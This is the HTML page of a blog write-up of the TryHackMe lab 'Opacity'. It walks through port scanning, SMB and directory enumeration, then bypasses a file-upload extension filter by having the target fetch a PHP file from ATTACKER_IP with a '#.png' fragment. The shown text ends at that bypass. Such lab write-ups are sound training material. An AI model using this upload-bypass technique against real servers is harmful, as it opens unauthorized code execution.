<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Opacity" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts." />
<meta property="og:description" content="Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts." />
<link rel="canonical" href="https://github.com/NullBrunk/posts/thm-opacity/" />
<meta property="og:url" content="https://github.com/NullBrunk/posts/thm-opacity/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:image" content="https://github.com/NullBrunk/assets/img/writeups/thm/opacity/opacity.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-02T16:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://github.com/NullBrunk/assets/img/writeups/thm/opacity/opacity.png" />
<meta property="twitter:title" content="Opacity" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2025-01-02T16:00:00+00:00","datePublished":"2025-01-02T16:00:00+00:00","description":"Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.","headline":"Opacity","image":"https://github.com/NullBrunk/assets/img/writeups/thm/opacity/opacity.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://github.com/NullBrunk/posts/thm-opacity/"},"url":"https://github.com/NullBrunk/posts/thm-opacity/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Opacity | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Web pentester, CTF player.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/ctfs/" class="nav-link">
              <i class="fa-fw fas fa-flag"></i>
              

              <span>CTFS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/resume/" class="nav-link">
              <i class="fa-fw fas fa-file"></i>
              

              <span>RESUME</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap justify-content-center align-items-center w-100">
    <a href="https://ctftime.org/user/157452" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fa-regular fa-font-awesome"></i>
    </a>

    <a href="https://www.root-me.org/NullBrunk" aria-label="rootme" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-skull"></i>
    </a>

    <a href="https://github.com/nullbrunk" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fab fa-github"></i>
    </a>

    <a href="https://tryhackme.com/p/nullbrunk" aria-label="tryhackme" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-cloud"></i>
    </a>

    <a href="mailto:anas.idiri.pro@gmail.com" aria-label="mail" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-envelope"></i>
    </a>
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11   col-xl-9  px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/tryhackme/">TryHackMe</a>
                </span>
            

             
             
            

            
             
            
            <span>Opacity</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Opacity</h1>
    
      <p class="post-desc fw-light mb-4">Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735833600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  2, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/writeups/thm/opacity/opacity.png" class="popup img-link preview-img shimmer"><img src="/assets/img/writeups/thm/opacity/opacity.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1611 words"
>
  <em>8 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Opacity</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Opacity</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction">Introduction</h1>

<p>Hello everyone, today we will be taking a look at <a href="https://tryhackme.com/r/room/opacity">Opacity</a>, an <span class="easy">Easy</span> rated room on <a href="https://tryhackme.com/">TryHackMe</a>. We will explore the exploitation of the File Upload vulnerability , before moving on to the privilege escalation phase. Let’s get started !</p>

<ol>
  <li>Enumeration
    <ul>
      <li><a href="#portscan">Portscan</a></li>
      <li><a href="#http-80">HTTP (80)</a>
        <ul>
          <li><a href="#directory-fuzzing">Directory Fuzzing</a></li>
          <li><a href="#cloud">/cloud/</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#testing-file-upload">Testing file upload</a></li>
      <li><a href="#bypassing-the-filter">Bypassing the filter</a></li>
      <li><a href="#rce">RCE</a></li>
    </ul>
  </li>
  <li>Privesc
    <ul>
      <li><a href="#manual-privesc">Manual privesc</a></li>
      <li><a href="#sysadmin">Sysadmin</a></li>
      <li><a href="#gaining-root">Gaining root</a>
        <ul>
          <li><a href="#theory">Theory</a></li>
          <li><a href="#practice">Practice</a></li>
        </ul>
      </li>
      <li><a href="#root">Root</a></li>
    </ul>
  </li>
</ol>

<hr />

<p><br /></p>

<h1 id="enum">Enum</h1>

<h2 id="portscan"><span class="me-2">Portscan</span><a href="#portscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Let’s start with a basic portscan. As always I to go with <a href="https://github.com/RustScan/RustScan">rustscan</a>, cause it’s pretty fast, specifying <code class="language-plaintext highlighter-rouge">service version</code> and <code class="language-plaintext highlighter-rouge">output normal</code> options for the subsequent <a href="https://www.kali.org/tools/nmap/">nmap</a> scan:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rustscan <span class="nt">-a</span> <span class="nv">$TARGET</span> <span class="nt">--</span> <span class="nt">-sV</span> <span class="nt">-oN</span> all_ports.txt
</pre></td></tr></tbody></table></code></div></div>

<div file="all_ports.txt" class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="all_ports.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
80/tcp  open  http        syn-ack Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
139/tcp open  netbios-ssn syn-ack Samba smbd 4
445/tcp open  netbios-ssn syn-ack Samba smbd 4
</pre></td></tr></tbody></table></code></div></div>

<p><strong>What do we learn from this portscan ?</strong></p>
<ul>
  <li>The target is likely running linux</li>
  <li>SSH, HTTP, and SMB are running</li>
</ul>

<h2 id="smb-139-445"><span class="me-2">SMB (139, 445)</span><a href="#smb-139-445" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>I always start by enumerating file sharing protocols because they often contain juicy. I like to use <a href="https://www.kali.org/tools/enum4linux/">enum4linux</a> when enumerating samba, to make sure I don’t miss anything.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>enum4linux <span class="nv">$TARGET</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>	Sharename       Type      Comment
	<span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
	print<span class="nv">$ </span>         Disk      Printer Drivers
	IPC<span class="nv">$ </span>           IPC       IPC Service <span class="o">(</span>opacity server <span class="o">(</span>Samba, Ubuntu<span class="o">))</span>

<span class="o">[</span>+] Attempting to map shares on 10.10.151.131
//10.10.151.131/print<span class="nv">$	</span>Mapping: DENIED Listing: N/A Writing: N/A
//10.10.151.131/IPC<span class="nv">$	</span>Mapping: N/A Listing: N/A Writing: N/A
</pre></td></tr></tbody></table></code></div></div>

<p>These are two default shares, and we don’t have access to them. Let’s move on.</p>

<h2 id="http-80"><span class="me-2">HTTP (80)</span><a href="#http-80" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><a href="/assets/img/writeups/thm/opacity/index_page.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/index_page.png" alt="index"  loading="lazy"></a>
<em>Website index page</em></p>

<p>Interesting ! Maybe we could try bruteforcing the login form, or identifying an SQL injection later. Since we’re still in the enumeration phase, let’s not rush things.</p>

<h3 id="directory-fuzzing"><span class="me-2">Directory fuzzing</span><a href="#directory-fuzzing" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Time for some <a href="https://www.thehacker.recipes/web/recon/directory-fuzzing">directory fuzzing</a> I guess. I’ll use <a href="https://www.kali.org/tools/ffuf/">ffuf</a>, and go with the <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt">directory-list2.3-medium</a> from <a href="https://github.com/danielmiessler/SecLists/tree/master">SecLists</a> to make sure we don’t miss any hidden directories:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>ffuf <span class="nt">-u</span> <span class="s2">"http://10.10.151.131/FUZZ"</span> <span class="se">\</span>
     <span class="nt">-w</span> /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/opacity/ffuf_new_hit.png" class="popup img-link  shimmer"><img src="/assets/img/writeups/thm/opacity/ffuf_new_hit.png" alt="index" loading="lazy"></a> {: .radius-shadow }</p>

<h3 id="cloud"><span class="me-2">/cloud/</span><a href="#cloud" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Let’s access it from our browser:</p>

<p><a href="/assets/img/writeups/thm/opacity/cloud_page.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/cloud_page.png" alt="index"  loading="lazy"></a></p>

<p>I’m pretty sure that there’s a <a href="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload">file upload</a> vulnerability in here. Let’s try to exploit it !</p>

<h1 id="exploit">Exploit</h1>

<h2 id="testing-file-upload"><span class="me-2">Testing file upload</span><a href="#testing-file-upload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Alright, so basically, here’s how the application works:</p>
<ul>
  <li>We provide a link to an image.</li>
  <li>It downloads the image and displays it.</li>
</ul>

<p>The first think I want to check is giving a link to an image that doesn’t exist. For example let’s try to enter <code class="language-plaintext highlighter-rouge">.png</code>:</p>

<p><a href="/assets/img/writeups/thm/opacity/trying_to_upload_just_.png.gif" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/trying_to_upload_just_.png.gif" alt="xsserve"  loading="lazy"></a></p>

<p>Seems like there’s no check to verify if the image actually exists. Let’s try uploading <code class="language-plaintext highlighter-rouge">.php</code> then.</p>

<p><a href="/assets/img/writeups/thm/opacity/just_.php.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/just_.php.png" alt="index"  loading="lazy"></a></p>

<p>And … The webapp refuses to upload it. So there is probably some kind of filter checking the extension but I don’t know exactly how. Let’s try uploading some real files to see how the webserver responds.</p>

<p>So first thing first I launch an http server with python to serve files</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nb">mkdir</span> ~/Pictures/Chroot
<span class="nb">cd</span> ~/Pictures/Chroot
python3 <span class="nt">-m</span> http.server 80
</pre></td></tr></tbody></table></code></div></div>

<p>In the same directory (<code class="language-plaintext highlighter-rouge">~/Pictures/Chroot</code>), I create a file named <code class="language-plaintext highlighter-rouge">phpinfo.php</code></p>
<div file="phpinfo.php" class="language-php highlighter-rouge"><div class="code-header">
        <span data-label-text="phpinfo.php"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="cp">&lt;?php</span> 
<span class="k">echo</span> <span class="nb">phpinfo</span><span class="p">();</span>
<span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Then, I copy it, creating multiple versions with multiple extensions:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="nb">cp </span>phpinfo.php phpinfo.php.png <span class="c"># Double extension that ends with an image extension</span>
<span class="nb">cp </span>phpinfo.php phpinfo.png.php <span class="c"># Double extension that ends with the PHP extension</span>
</pre></td></tr></tbody></table></code></div></div>

<p>I tried uploading the <code class="language-plaintext highlighter-rouge">.png.php</code> (by giving this url to the webapp: <code class="language-plaintext highlighter-rouge">http://ATTACKER_IP/phpinfo.png.php</code>), but it didn’t work.</p>

<p>Next I tried the <code class="language-plaintext highlighter-rouge">.php.png</code> (by giving this url to the webapp: <code class="language-plaintext highlighter-rouge">http://ATTACKER_IP/phpinfo.php.png</code>), It uploaded it but when trying to access it:</p>

<p><a href="/assets/img/writeups/thm/opacity/try_to_access_it.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/try_to_access_it.png" alt="index"  loading="lazy"></a></p>

<h2 id="bypassing-the-filter"><span class="me-2">Bypassing the filter</span><a href="#bypassing-the-filter" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Recently, I was watching a <a href="https://www.youtube.com/watch?v=jwBRgaIRdgs">youtube video</a> from John Hammond where he was exploiting an LFI. To bypass a filter, he used a strange filter evasion technique with the <code class="language-plaintext highlighter-rouge">#</code>.</p>

<blockquote>
  <p>The # in a URL is used to denote an anchor or fragment identifier. This tells the browser to navigate to a specific part of the page, typically an element with a corresponding id.</p>
</blockquote>

<p>I thought: could be a good idea to try.</p>

<div file="target_url" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="target_url"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>http://ATTACKER_IP/phpinfo.php#.png
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/opacity/trickforthewin.gif" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/opacity/trickforthewin.gif" alt="xsserve"  loading="lazy"></a></p>

